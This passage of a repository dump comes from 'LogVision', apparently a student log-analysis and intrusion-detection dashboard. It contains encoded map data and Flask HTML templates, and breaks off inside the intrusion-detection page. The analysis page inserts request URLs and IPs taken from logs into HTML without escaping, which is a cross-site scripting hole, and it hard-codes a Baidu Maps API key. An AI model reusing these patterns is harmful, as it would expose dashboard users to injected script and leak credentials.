Africa\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ĐŽĐđ[ûuëǾǓRį`ĞƋ̳ʣòʱģȷ[Mįàſ©ΟôǏƠҋ̓Oѯʟ̫ńĉƸˏƖÌ®Ó᠁ࠑƐշޅ­ӗʓŷҙ̩۟މࢿȭéϑĦ˳إƪɍȌɥ¨ϩݧƇঽ࡚ǵ֢A౞@˒@˒@ڠȘ@൒@ĶZåǄH²pĜØފcܔͲɑXʋފǤ¼Ή֪ɡڢÙˮ͖Βխ۶ʓŜˋƮõʆϋǀ{̒ŲȄǃjંʋÓmǅΟÎӥҌċȶɘࡢܸǟϢЀτzʦ༔ʖâǇ¾õÜÝĞ»ɰJĊð¹lûİēȶFÝlۂɥƎíÜǷŸf\"],\"encodeOffsets\":[[33944,-9834]]},\"properties\":{\"name\":\"Zambia\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ǵḀ̄TɁ}ɩʍĜȩʇYA¥ßàǍ¾aȄࡗȲ́ЬTҼͯrđ͆ࡓӀȕԌבࠂ`ƨئƩ˴ϒĥȮêފࣀ̪۠ŸҚӘʔކ®̑ڢyעͽࡐʃÑƝĮఏʗӥŴƍÓʇǸԃп֥śЏÜƉࡁࡃšđ\"],\"encodeOffsets\":[[32039,-22939]]},\"properties\":{\"name\":\"Zimbabwe\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ڽը¿ުەߖ٬֖NΦxHޠцǒŴ\\\\ǔéº`Ęfú[ǜ¹~}¢ũYĨĀcĖÌ£¢áfÁnÛ½˩ƄÇÞŻ~eÖBŒvİ¤RXĩÌĄ§a÷Îŕ÷ĸȣ¡ıǽûsmQ}«»ď§řjʅõōDđ³Û«ŷ³அɘŅĭāuƕɳ`«Ī¢§NÙéõʠ{ɩɥƤǵšɇ\"],\"encodeOffsets\":[[75785,34052]]},\"properties\":{\"name\":\"\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@͙̄͟ƹիԠύfʛϋӻýģлʫ@˭ƪǕIđmɜ\\\\cȝ`¥CƴˁȖƈʊƣǶɪɦʟ|öÜêO¡¨ĩ_¬ƖɴĂxĮņஆɗŸ´Ü¬Ĕ´ŌCʆöŚiĐ¨®¼P~tnǾü~Ðd¢̀ǊŰÜŀÄĒ¬Ȳ_́êǁƘ˹ҎǹÒĽȱǷ´ǡæͅìíƐĵn­ĵ§rчɃŝƑŢa¸ȵw\"]],\"encodeOffsets\":[[[80376,33312]]]},\"properties\":{\"name\":\"\",\"childNum\":1}}],\"UTF8Encoding\":true});}));"
  },
  {
    "path": "flask/templates/about.html",
    "content": "<!DOCTYPE html>\n<html>\n\n<head>\n    <title>LogVision-关于系统</title>\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" charset=\"utf-8\">\n    <!-- Bootstrap -->\n    <link href=\"https://cdn.bootcdn.net/ajax/libs/twitter-bootstrap/3.0.3/css/bootstrap.min.css\" rel=\"stylesheet\">\n    <!-- styles -->\n    <link href=\"../static/css/styles.css\" rel=\"stylesheet\">\n\n</head>\n\n<body>\n    <div class=\"header\">\n        <div class=\"container\">\n            <div class=\"row\">\n                <div class=\"col-md-12\">\n                    <!-- Logo -->\n                    <div class=\"logo\">\n                        <h1><a href=\"index.html\">实时日志分析与入侵检测系统</a></h1>\n                    </div>\n                </div>\n            </div>\n        </div>\n    </div>\n\n    <div class=\"page-content\">\n        <div class=\"row\">\n            <div class=\"col-md-2\">\n                <div class=\"sidebar content-box\" style=\"display: block;\">\n                    <ul class=\"nav\">\n                        <!-- Main menu -->\n                        <li><a href=\"welcome\"><i class=\"glyphicon glyphicon-asterisk\"></i> 欢迎</a>\n                        </li>\n\n                        <li><a href=\"analysis\"><i class=\"glyphicon glyphicon-stats\"></i> 实时日志分析</a>\n                        </li>\n\n                        <li><a href=\"id\"><i class=\"glyphicon glyphicon-adjust\"></i> 实时入侵检测</a>\n                        </li>\n\n                        <li class=\"current\"><a href=\"about\"><i class=\"glyphicon glyphicon-info-sign\"></i> 关于系统</a></li>\n\n                    </ul>\n                </div>\n            </div>\n            <div class=\"col-md-10\">\n                <div class=\"row\">\n                    <div class=\"col-md-12\">\n                        <div class=\"content-box-header\">\n                            <div class=\"panel-title\">关于系统</div>\n                        </div>\n                        <div class=\"content-box-large box-with-header\">\n                            <h4>\n                                <a href='https://www.github.com/xander-wang/logvision'>请参考GitHub</a>\n                            </h4>\n                        </div>\n                    </div>\n                </div>\n            </div>    \n        </div>\n\n        <footer>\n            <div class=\"container\">\n\n                <div class=\"copy text-center\">\n                    实时日志分析与入侵检测系统 仅供个人毕业设计演示用途<br> <a href='https://www.github.com/xander-wang/logvision'>xander-wang/logvision</a>\n                </div>\n            </div>\n        </footer>\n\n        <!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->\n        <script src=\"https://code.jquery.com/jquery.js\"></script>\n    <!-- Include all compiled plugins (below), or include individual files as needed -->\n    <script src=\"../static/js/custom.js\"></script>\n</body>\n\n</html>"
  },
  {
    "path": "flask/templates/analysis.html",
    "content": "<!DOCTYPE html>\n<html>\n\n<head>\n    <title>LogVision-日志分析</title>\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" charset=\"utf-8\">\n    <link href=\"https://cdn.bootcdn.net/ajax/libs/twitter-bootstrap/3.0.3/css/bootstrap.min.css\" rel=\"stylesheet\">\n    <link href=\"../static/css/styles.css\" rel=\"stylesheet\">\n\n    <script type=\"text/javascript\" src=\"https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js\"></script>\n    <script type=\"text/javascript\" src=\"https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.3.0/socket.io.js\"></script>\n\n    <script type=\"text/javascript\" src=\"../static/js/echarts/echarts.js\"></script>\n    <script type=\"text/javascript\" src=\"../static/js/echarts/map/js/china.js\"></script>\n    <script type=\"text/javascript\" src=\"../static/js/echarts/map/js/world.js\"></script>\n    <script type=\"text/javascript\" src=\"../static/js//echarts/extension/dataTool.js\"></script>\n    <script type=\"text/javascript\" src=\"../static/js/echarts/extension/bmap.js\"></script>\n    <script type=\"text/javascript\"\n        src=\"https://api.map.baidu.com/api?v=2.0&amp;ak=KOmVjPVUAey1G2E8zNhPiuQ6QiEmAwZu&amp;__ec_v__=20190126\"></script>\n    <script type=\"text/javascript\"\n        src=\"https://api.map.baidu.com/getscript?v=2.0&amp;ak=KOmVjPVUAey1G2E8zNhPiuQ6QiEmAwZu&amp;services=&amp;t=20200327103013\"></script>\n\n</head>\n\n<body>\n    <div class=\"header\">\n        <div class=\"container\">\n            <div class=\"row\">\n                <div class=\"col-md-12\">\n                    <!-- Logo -->\n                    <div class=\"logo\">\n                        <h1><a href=\"index.html\">实时日志分析与入侵检测系统</a></h1>\n                    </div>\n                </div>\n\n            </div>\n        </div>\n    </div>\n\n    <div class=\"page-content\">\n        <div class=\"row\">\n            <div class=\"col-md-2\">\n                <div class=\"sidebar content-box\" style=\"display: block;\">\n                    <ul class=\"nav\">\n                        <!-- Main menu -->\n                        <li><a href=\"welcome\"><i class=\"glyphicon glyphicon-asterisk\"></i> 欢迎</a>\n                        </li>\n\n                        <li class=\"current\"><a href=\"analysis\"><i class=\"glyphicon glyphicon-stats\"></i> 实时日志分析</a>\n                        </li>\n\n                        <li><a href=\"id\"><i class=\"glyphicon glyphicon-adjust\"></i> 实时入侵检测</a>\n                        </li>\n\n                        <li><a href=\"about\"><i class=\"glyphicon glyphicon-info-sign\"></i> 关于系统</a></li>\n\n                    </ul>\n                </div>\n            </div>\n            <div class=\"col-md-10\">\n                <div class=\"row\">\n                    <div class=\"col-md-6\">\n                        <div class=\"alert alert-success\" role=\"alert\">\n                            <h4 class=\"alert-heading\">实时日志分析</h4>\n                            <p>实时日志分析功能可提供实时日志字段计数、数据图表与地理信息汇总等数据可视化展示功能，数据展示有一定延迟。</p>\n                        </div>\n                    </div>\n                    <div class=\"col-md-6\">\n                        <div class=\"row\">\n                            <div class=\"col-md-12\">\n                                <div class=\"alert alert-info\" role=\"alert\">\n                                    <h4 id=\"sys_time\" class=\"alert-heading\">Loading...</h4>\n                                    <p>系统时间</p>\n                                </div>\n                            </div>\n                        </div>\n                    </div>\n                    <script>\n                        $(document).ready(function () {\n                            namespace = '/sys_time';\n                            var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                            socket.on('sys_time', function (res) {\n                                document.getElementById(\"sys_time\").innerText = res.data;\n                            });\n                        });\n                    </script>\n                </div>\n\n                <div class=\"row\">\n                    <div class=\"col-md-8\">\n                        <div class=\"content-box-header\">\n                            <div class=\"panel-title\">实时计数器</div>\n                        </div>\n                        <div class=\"content-box-large box-with-header\">\n                            <div class=\"row\">\n                                <div class=\"col-md-3\">\n                                    <div class=\"alert alert-dark\" role=\"alert\">\n                                        <h4 class=\"alert-heading\">总请求数</h4>\n                                        <h2 id=\"host_count\">...</h2>\n                                    </div>\n                                </div>\n                                <div class=\"col-md-3\">\n                                    <div class=\"alert alert-dark\" role=\"alert\">\n                                        <h4 class=\"alert-heading\">成功请求数</h4>\n                                        <h2 id=\"success_count\">...</h2>\n                                    </div>\n                                </div>\n                                <div class=\"col-md-3\">\n                                    <div class=\"alert alert-dark\" role=\"alert\">\n                                        <h4 class=\"alert-heading\">其他请求数</h4>\n                                        <h2 id=\"other_count\">...</h2>\n                                    </div>\n                                </div>\n                                <div class=\"col-md-3\">\n                                    <div class=\"alert alert-dark\" role=\"alert\">\n                                        <h4 class=\"alert-heading\">访客数</h4>\n                                        <h2 id=\"visitor_count\">...</h2>\n                                    </div>\n                                </div>\n                            </div>\n                            <div class=\"row\">\n                                <div class=\"col-md-3\">\n                                    <div class=\"alert alert-dark\" role=\"alert\">\n                                        <h4 class=\"alert-heading\">资源数</h4>\n                                        <h2 id=\"url_count\">...</h2>\n                                    </div>\n                                </div>\n                                <div class=\"col-md-3\">\n                                    <div class=\"alert alert-dark\" role=\"alert\">\n                                        <h4 class=\"alert-heading\">流量大小 (MB)</h4>\n                                        <h2 id=\"traffic_sum\">...</h2>\n                                    </div>\n                                </div>\n                                <div class=\"col-md-3\">\n                                    <div class=\"alert alert-dark\" role=\"alert\">\n                                        <h4 class=\"alert-heading\">日志大小 (MB)</h4>\n                                        <h2 id=\"log_size\">...</h2>\n                                    </div>\n                                </div>\n                            </div>\n                        </div>\n                    </div>\n                    <script>\n                        $(document).ready(function () {\n                            namespace = '/count_board';\n                            var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                            socket.on('count_board', function (res) {\n                                document.getElementById(\"host_count\").innerText = res.host_count;\n                                document.getElementById(\"success_count\").innerText = res.success_count;\n                                document.getElementById(\"other_count\").innerText = res.other_count;\n                                document.getElementById(\"visitor_count\").innerText = res.visitor_count;\n                                document.getElementById(\"url_count\").innerText = res.url_count;\n                                document.getElementById(\"traffic_sum\").innerText = res.traffic_sum;\n                                document.getElementById(\"log_size\").innerText = res.log_size;\n                            });\n                        });\n                    </script>\n\n\n                    <div class=\"col-md-4\">\n                        <div class=\"content-box-header\">\n                            <div class=\"panel-title\">实时热门位置</div>\n                        </div>\n                        <div class=\"content-box-large box-with-header\">\n                            <div id=\"geo\" style=\"height:270px;\"></div>\n                        </div>\n                    </div>\n                    <script>\n                        var geo = echarts.init(document.getElementById('geo'));\n                        window.onresize = function () {\n                            geo.resize();\n                        };\n                        geo.showLoading();\n                        geo.setOption({\n                            tooltip: {\n                                trigger: 'item',\n                                formatter: '{a}<br/>IP地址: {b}<br/>坐标和计数: {c}'\n                            },\n                            bmap: {\n                                center: [118, 32],\n                                zoom: 5,\n                                roam: true,\n                                mapStyle: {\n                                    styleJson: [{\n                                        'featureType': 'water',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#d1d1d1'\n                                        }\n                                    }, {\n                                        'featureType': 'land',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#f3f3f3'\n                                        }\n                                    }, {\n                                        'featureType': 'railway',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'highway',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#fdfdfd'\n                                        }\n                                    }, {\n                                        'featureType': 'highway',\n                                        'elementType': 'labels',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'arterial',\n                                        'elementType': 'geometry',\n                                        'stylers': {\n                                            'color': '#fefefe'\n                                        }\n                                    }, {\n                                        'featureType': 'arterial',\n                                        'elementType': 'geometry.fill',\n                                        'stylers': {\n                                            'color': '#fefefe'\n                                        }\n                                    }, {\n                                        'featureType': 'poi',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'green',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'subway',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'manmade',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#d1d1d1'\n                                        }\n                                    }, {\n                                        'featureType': 'local',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#d1d1d1'\n                                        }\n                                    }, {\n                                        'featureType': 'arterial',\n                                        'elementType': 'labels',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'boundary',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#fefefe'\n                                        }\n                                    }, {\n                                        'featureType': 'building',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#d1d1d1'\n                                        }\n                                    }, {\n                                        'featureType': 'label',\n                                        'elementType': 'labels.text.fill',\n                                        'stylers': {\n                                            'color': '#999999'\n                                        }\n                                    }]\n                                }\n                            },\n                            series: [\n                                {\n                                    name: '热门位置',\n                                    type: 'effectScatter',\n                                    coordinateSystem: 'bmap',\n                                    showEffectOn: 'render',\n                                    rippleEffect: {\n                                        brushType: 'stroke'\n                                    },\n                                    hoverAnimation: true,\n                                    label: {\n                                        formatter: '{b}',\n                                        position: 'right',\n                                        show: true\n                                    },\n                                    itemStyle: {\n                                        color: 'purple',\n                                        shadowBlur: 10,\n                                        shadowColor: '#333'\n                                    },\n                                    zlevel: 1\n                                }\n                            ]\n                        });\n\n                        $(document).ready(function () {\n                            namespace = '/hot_geo';\n                            var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                            socket.on('hot_geo', function (res) {\n                                geo.hideLoading();\n                                geo.setOption({\n                                    series: [{\n                                        data: res.data,\n                                        symbolSize: 10,\n                                    }]\n                                })\n                                console.log(res.data)\n                            });\n                        });\n                    </script>\n\n\n                </div>\n                <div class=\"row\">\n                    <div class=\"col-md-9\">\n                        <div class=\"row\">\n                            <div class=\"col-md-7\">\n                                <div class=\"content-box-header\">\n                                    <div class=\"panel-title\">实时热门资源排名</div>\n                                </div>\n                                <div class=\"content-box-large box-with-header\">\n\n                                    <table id=\"url\" class=\"table table-sm table-striped\">\n                                        <thead>\n                                            <tr>\n                                                <th scope=\"col\">排名</th>\n                                                <th scope=\"col\">资源位置</th>\n                                                <th scope=\"col\">请求次数</th>\n                                            </tr>\n                                        </thead>\n                                        <tbody>\n\n                                        </tbody>\n                                    </table>\n\n                                </div>\n                            </div>\n                            <script>\n                                $(document).ready(function () {\n                                    namespace = '/hot_url';\n                                    var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                                    var items = \"\"\n                                    socket.on('hot_url', function (res) {\n                                        items = \"\"\n                                        $(\"#url tbody\").html(\"\");\n\n                                        $.each(res.data, function (i, item) {\n                                            items += \"<tr>\";\n                                            items += \"<th scope='row'>\" + item.no + \"</td>\";\n                                            items += \"<td>\" + item.url + \"</td>\";\n                                            items += \"<td>\" + item.count + \"</td>\";\n                                            items += \"</tr>\";\n                                        });\n                                        $('#url tbody').append(items);\n                                    });\n                                });\n                            </script>\n\n                            <div class=\"col-md-5\">\n                                <div class=\"content-box-header\">\n                                    <div class=\"panel-title\">实时热门IP排名</div>\n                                </div>\n                                <div class=\"content-box-large box-with-header\">\n\n                                    <table id=\"ip\" class=\"table table-sm table-striped\">\n                                        <thead>\n                                            <tr>\n                                                <th scope=\"col\">排名</th>\n                                                <th scope=\"col\">IP地址</th>\n                                                <th scope=\"col\">位置</th>\n                                                <th scope=\"col\">请求次数</th>\n                                            </tr>\n                                        </thead>\n                                        <tbody>\n\n                                        </tbody>\n                                    </table>\n\n                                </div>\n                            </div>\n                            <script>\n                                $(document).ready(function () {\n                                    namespace = '/hot_ip';\n                                    var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                                    var items = \"\"\n                                    socket.on('hot_ip', function (res) {\n                                        items = \"\"\n                                        $(\"#ip tbody\").html(\"\");\n\n                                        $.each(res.data, function (i, item) {\n                                            items += \"<tr>\";\n                                            items += \"<th scope='row'>\" + item.no + \"</td>\";\n                                            items += \"<td>\" + item.ip + \"</td>\";\n                                            items += \"<td>\" + item.address + \"</td>\";\n                                            items += \"<td>\" + item.count + \"</td>\";\n                                            items += \"</tr>\";\n                                        });\n                                        $('#ip tbody').append(items);\n                                    });\n                                });\n                            </script>\n                        </div>\n\n                        <div class=\"row\">\n                            <div class=\"col-md-6\">\n                                <div class=\"content-box-header\">\n                                    <div class=\"panel-title\">实时状态码比例</div>\n                                </div>\n                                <div class=\"content-box-large box-with-header\">\n                                    <div class=\"container-fluid\">\n                                        <div id=\"status_code_pie\" style=\"height: 300px;\"></div>\n                                    </div>\n                                </div>\n                            </div>\n                            <script>\n                                var status_code_pie = echarts.init(document.getElementById('status_code_pie'));\n                                window.onresize = function () {\n                                    status_code_pie.resize();\n                                };\n                                status_code_pie.showLoading();\n                                status_code_pie.setOption({\n                                    tooltip: {\n                                        trigger: 'item',\n                                        formatter: '{a} <br/>{b} : {c} ({d}%)'\n                                    },\n                                    legend: {\n                                        type: 'scroll',\n                                        orient: 'vertical',\n                                        right: 10,\n                                        top: 20,\n                                        bottom: 20,\n                                        data: []\n                                    },\n                                    series: [\n                                        {\n                                            name: '实时状态码比例',\n                                            type: 'pie',\n                                            radius: '55%',\n                                            center: ['40%', '50%'],\n                                            data: [],\n                                            emphasis: {\n                                                itemStyle: {\n                                                    shadowBlur: 10,\n                                                    shadowOffsetX: 0,\n                                                    shadowColor: 'rgba(0, 0, 0, 0.5)'\n                                                }\n                                            }\n                                        }\n                                    ]\n                                });\n\n                                $(document).ready(function () {\n                                    namespace = '/status_code_pie';\n                                    var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                                    socket.on('status_code_pie', function (res) {\n                                        status_code_pie.hideLoading();\n                                        status_code_pie.setOption({\n                                            legend: {\n                                                data: res.legend\n                                            },\n                                            series: [\n                                                {\n                                                    data: res.data\n                                                }\n                                            ]\n                                        });\n                                    });\n                                });\n                            </script>\n\n                            <div class=\"col-md-6\">\n                                <div class=\"content-box-header\">\n                                    <div class=\"panel-title\">实时请求方式比例</div>\n                                </div>\n                                <div class=\"content-box-large box-with-header\">\n                                    <div class=\"container-fluid\">\n                                        <div id=\"req_method_pie\" style=\"height: 300px;\"></div>\n                                    </div>\n                                </div>\n                            </div>\n                            <script>\n                                var req_method_pie = echarts.init(document.getElementById('req_method_pie'));\n                                window.onresize = function () {\n                                    req_method_pie.resize();\n                                };\n                                req_method_pie.showLoading();\n                                req_method_pie.setOption({\n                                    tooltip: {\n                                        trigger: 'item',\n                                        formatter: '{a} <br/>{b} : {c} ({d}%)'\n                                    },\n                                    legend: {\n                                        type: 'scroll',\n                                        orient: 'vertical',\n                                        right: 10,\n                                        top: 20,\n                                        bottom: 20,\n                                        data: []\n                                    },\n                                    series: [\n                                        {\n                                            name: '实时请求方式比例',\n                                            type: 'pie',\n                                            radius: '55%',\n                                            center: ['40%', '50%'],\n                                            data: [],\n                                            emphasis: {\n                                                itemStyle: {\n                                                    shadowBlur: 10,\n                                                    shadowOffsetX: 0,\n                                                    shadowColor: 'rgba(0, 0, 0, 0.5)'\n                                                }\n                                            }\n                                        }\n                                    ]\n                                });\n\n                                $(document).ready(function () {\n                                    namespace = '/req_method_pie';\n                                    var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                                    socket.on('req_method_pie', function (res) {\n                                        req_method_pie.hideLoading();\n                                        req_method_pie.setOption({\n                                            legend: {\n                                                data: res.legend\n                                            },\n                                            series: [\n                                                {\n                                                    data: res.data\n                                                }\n                                            ]\n                                        });\n                                    });\n                                });\n                            </script>\n\n                        </div>\n\n                        <div class=\"content-box-header\">\n                            <div class=\"panel-title\">实时请求计数（按时间顺序）</div>\n                        </div>\n                        <div class=\"content-box-large box-with-header\">\n                            <div class=\"container-fluid\">\n                                <div id=\"req_count_timeline\" style=\"height: 350px;\"></div>\n                            </div>\n                        </div>\n                        <script>\n                            var req_count_timeline = echarts.init(document.getElementById('req_count_timeline'));\n                            window.onresize = function () {\n                                req_count_timeline.resize();\n                            };\n                            req_count_timeline.showLoading();\n                            req_count_timeline.setOption({\n                                tooltip: {\n                                    trigger: 'axis',\n                                    position: function (pt) {\n                                        return [pt[0], '10%'];\n                                    }\n                                },\n                                xAxis: {\n                                    type: 'category',\n                                    boundaryGap: false,\n                                    data: []\n                                },\n                                yAxis: {\n                                    type: 'value',\n                                    boundaryGap: [0, '100%']\n                                },\n                                dataZoom: [{\n                                    type: 'inside',\n                                    start: 0,\n                                    end: 10\n                                }, {\n                                    start: 0,\n                                    end: 10,\n                                    handleIcon: 'M10.7,11.9v-1.3H9.3v1.3c-4.9,0.3-8.8,4.4-8.8,9.4c0,5,3.9,9.1,8.8,9.4v1.3h1.3v-1.3c4.9-0.3,8.8-4.4,8.8-9.4C19.5,16.3,15.6,12.2,10.7,11.9z M13.3,24.4H6.7V23h6.6V24.4z M13.3,19.6H6.7v-1.4h6.6V19.6z',\n                                    handleSize: '80%',\n                                    handleStyle: {\n                                        color: '#fff',\n                                        shadowBlur: 3,\n                                        shadowColor: 'rgba(0, 0, 0, 0.6)',\n                                        shadowOffsetX: 2,\n                                        shadowOffsetY: 2\n                                    }\n                                }],\n                                series: [\n                                    {\n                                        name: '请求数量',\n                                        type: 'line',\n                                        smooth: true,\n                                        symbol: 'none',\n                                        sampling: 'average',\n                                        itemStyle: {\n                                            color: 'rgb(255, 70, 131)'\n                                        },\n                                        areaStyle: {\n                                            color: new echarts.graphic.LinearGradient(0, 0, 0, 1, [{\n                                                offset: 0,\n                                                color: 'rgb(255, 158, 68)'\n                                            }, {\n                                                offset: 1,\n                                                color: 'rgb(255, 70, 131)'\n                                            }])\n                                        },\n                                        data: []\n                                    }\n                                ]\n                            });\n\n                            $(document).ready(function () {\n                                namespace = '/req_count_timeline';\n                                var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                                socket.on('req_count_timeline', function (res) {\n                                    req_count_timeline.hideLoading();\n                                    req_count_timeline.setOption({\n                                        xAxis: {\n                                            data: res.date\n                                        },\n                                        series: [\n                                            {\n                                                data: res.data\n                                            }\n                                        ]\n                                    });\n                                });\n                            });\n                        </script>\n\n                        <div class=\"content-box-header\">\n                            <div class=\"panel-title\">IP请求数排序</div>\n                        </div>\n                        <div class=\"content-box-large box-with-header\">\n                            <div class=\"container-fluid\">\n                                <div id=\"ip_ranking\" style=\"height: 300px;\"></div>\n                            </div>\n                        </div>\n                        <script>\n                            var ip_ranking = echarts.init(document.getElementById('ip_ranking'));\n                            window.onresize = function () {\n                                ip_ranking.resize();\n                            }\n                            ip_ranking.showLoading();\n                            ip_ranking.setOption({\n                                color: ['#3398DB'],\n                                tooltip: {\n                                    trigger: 'axis',\n                                    axisPointer: {\n                                        type: 'shadow'\n                                    }\n                                },\n                                grid: {\n                                    left: '3%',\n                                    right: '4%',\n                                    bottom: '3%',\n                                    containLabel: true\n                                },\n                                xAxis: [\n                                    {\n                                        type: 'category',\n                                        data: [],\n                                        axisTick: {\n                                            alignWithLabel: true\n                                        },\n                                    }\n                                ],\n                                yAxis: [\n                                    {\n                                        type: 'value'\n                                    }\n                                ],\n                                series: [\n                                    {\n                                        name: '请求数',\n                                        type: 'bar',\n                                        barWidth: '60%',\n                                        data: []\n                                    }\n                                ]\n                            });\n\n                            $(document).ready(function () {\n                                namespace = '/ip_ranking';\n                                var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                                socket.on('ip_ranking', function (res) {\n                                    ip_ranking.hideLoading();\n                                    ip_ranking.setOption({\n                                        xAxis: [\n                                            {\n                                                data: res.ip\n                                            }\n                                        ],\n                                        series: [\n                                            {\n                                                data: res.count\n                                            }\n                                        ]\n                                    });\n                                });\n                            });\n                        </script>\n\n\n\n                    </div>\n\n                    <div class=\"col-md-3\">\n                        <div class=\"content-box-header\">\n                            <div class=\"panel-title\">实时日志流</div>\n                        </div>\n                        <div class=\"content-box-large box-with-header\">\n                            <h5 id=\"log_stream\">\n                                Loading...\n                                <br><br>\n                            </h5>\n                        </div>\n                    </div>\n                    <script>\n                        $(document).ready(function () {\n                            namespace = '/log_stream';\n                            var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                            socket.on('log_stream', function (res) {\n                                document.getElementById(\"log_stream\").innerText = res.data;\n                            });\n                        });\n                    </script>\n                </div>\n\n            </div>\n        </div>\n\n        <footer>\n            <div class=\"container\">\n\n                <div class=\"copy text-center\">\n                    实时日志分析与入侵检测系统 仅供个人毕业设计演示用途<br> <a\n                        href='https://www.github.com/xander-wang/logvision'>xander-wang/logvision</a>\n                </div>\n\n            </div>\n        </footer>\n\n        <script type=\"text/javascript\">\n\n            // 准备图表\n\n            // 自适应\n\n\n            // ws数据接口\n\n\n\n\n\n\n\n\n\n\n        </script>\n\n</body>\n\n</html>"
  },
  {
    "path": "flask/templates/id.html",
    "content": "<!DOCTYPE html>\n<html>\n\n<head>\n    <title>LogVision-入侵检测</title>\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" charset=\"utf-8\">\n    <link href=\"https://cdn.bootcdn.net/ajax/libs/twitter-bootstrap/3.0.3/css/bootstrap.min.css\" rel=\"stylesheet\">\n    <link href=\"../static/css/styles.css\" rel=\"stylesheet\">\n\n    <script type=\"text/javascript\" src=\"https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js\"></script>\n    <script type=\"text/javascript\" src=\"https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.3.0/socket.io.js\"></script>\n\n    <script type=\"text/javascript\" src=\"../static/js/echarts/echarts.js\"></script>\n    <script type=\"text/javascript\" src=\"../static/js/echarts/map/js/china.js\"></script>\n    <script type=\"text/javascript\" src=\"../static/js/echarts/map/js/world.js\"></script>\n    <script type=\"text/javascript\" src=\"../static/js//echarts/extension/dataTool.js\"></script>\n    <script type=\"text/javascript\" src=\"../static/js/echarts/extension/bmap.js\"></script>\n    <script type=\"text/javascript\"\n        src=\"https://api.map.baidu.com/api?v=2.0&amp;ak=KOmVjPVUAey1G2E8zNhPiuQ6QiEmAwZu&amp;__ec_v__=20190126\"></script>\n    <script type=\"text/javascript\"\n        src=\"https://api.map.baidu.com/getscript?v=2.0&amp;ak=KOmVjPVUAey1G2E8zNhPiuQ6QiEmAwZu&amp;services=&amp;t=20200327103013\"></script>\n</head>\n\n<body>\n    <div class=\"header\">\n        <div class=\"container\">\n            <div class=\"row\">\n                <div class=\"col-md-12\">\n                    <!-- Logo -->\n                    <div class=\"logo\">\n                        <h1><a href=\"index.html\">实时日志分析与入侵检测系统</a></h1>\n                    </div>\n                </div>\n\n            </div>\n        </div>\n    </div>\n\n    <div class=\"page-content\">\n        <div class=\"row\">\n            <div class=\"col-md-2\">\n                <div class=\"sidebar content-box\" style=\"display: block;\">\n                    <ul class=\"nav\">\n                        <!-- Main menu -->\n                        <li><a href=\"welcome\"><i class=\"glyphicon glyphicon-asterisk\"></i> 欢迎</a>\n                        </li>\n\n                        <li><a href=\"analysis\"><i class=\"glyphicon glyphicon-stats\"></i> 实时日志分析</a>\n                        </li>\n\n                        <li class=\"current\"><a href=\"id\"><i class=\"glyphicon glyphicon-adjust\"></i> 实时入侵检测</a>\n                        </li>\n\n                        <li><a href=\"about\"><i class=\"glyphicon glyphicon-info-sign\"></i> 关于系统</a></li>\n\n                    </ul>\n                </div>\n            </div>\n            <div class=\"col-md-10\">\n                <div class=\"row\">\n                    <div class=\"col-md-6\">\n                        <div class=\"alert alert-success\" role=\"alert\">\n                            <h4 class=\"alert-heading\">实时入侵检测</h4>\n                            <p>实时入侵检测使用实时日志中的请求资源地址与基于分类的方法，为入侵检测提供参考。</p>\n                        </div>\n                    </div>\n                    <div class=\"col-md-6\">\n                        <div class=\"row\">\n                            <div class=\"col-md-6\">\n                                <div class=\"alert alert-danger\" role=\"alert\">\n                                    <h4 id=\"bad_count\" class=\"alert-heading\">...</h4>\n                                    <p>可能异常请求实时计数</p>\n                                </div>\n                            </div>\n                            <div class=\"col-md-6\">\n                                <div class=\"alert alert-info\" role=\"alert\">\n                                    <h4 id=\"good_count\" class=\"alert-heading\">...</h4>\n                                    <p>可能正常请求实时计数</p>\n                                </div>\n                            </div>\n                        </div>\n                        <script>\n                            $(document).ready(function () {\n                                namespace = '/bad_count';\n                                var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                                socket.on('bad_count', function (res) {\n                                    document.getElementById(\"bad_count\").innerText = res.data;\n                                });\n                            });\n\n                            